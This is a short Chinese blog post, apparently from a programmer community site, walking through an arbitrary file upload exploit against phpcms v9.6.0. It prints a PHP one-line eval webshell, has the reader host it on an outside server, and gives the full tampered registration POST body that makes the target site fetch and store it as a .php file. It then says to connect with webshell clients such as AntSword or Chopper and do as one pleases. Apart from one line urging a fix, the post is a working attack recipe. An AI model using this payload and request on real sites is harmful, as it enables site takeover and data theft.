国内最全IT社区平台 联系我们 | 收藏本站
华晨云阿里云优惠2
您当前位置:首页 > 程序人生 > 随笔 > phpcms v9.6.0任意文件上传漏洞

phpcms v9.6.0任意文件上传漏洞

来源:程序员人生   发布时间:2021-09-16 09:37:19 阅读次数:5359次

经过亲自测试,本漏洞只针对phpcmx V9.6有效

首先我们在服务器上上传一个shell.txt一句话木门文件,内容为:

<?php @eval($_POST['wlsh']);?>

并且可以访问:http://www.baidu.com/shell.txt

然后在目标网站注册会员,打开burp,截断数据包,把post内容更改为

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=

利用repeater模块 查看回显包  得到shell地址。

phpcms v9.6.0任意文件上传漏洞

通过重新POST后,就可以看到自己上传的木马文件,

phpcms v9.6.0任意文件上传漏洞

然后用中国蚁剑或者菜刀连接后,就可以为所欲为了

这个漏洞危害很大,建议尽快修复!

生活不易,码农辛苦
如果您觉得本网站对您的学习有所帮助,可以手机扫描二维码进行捐赠
程序员人生
------分隔线----------------------------
分享到:
------分隔线----------------------------
关闭
程序员人生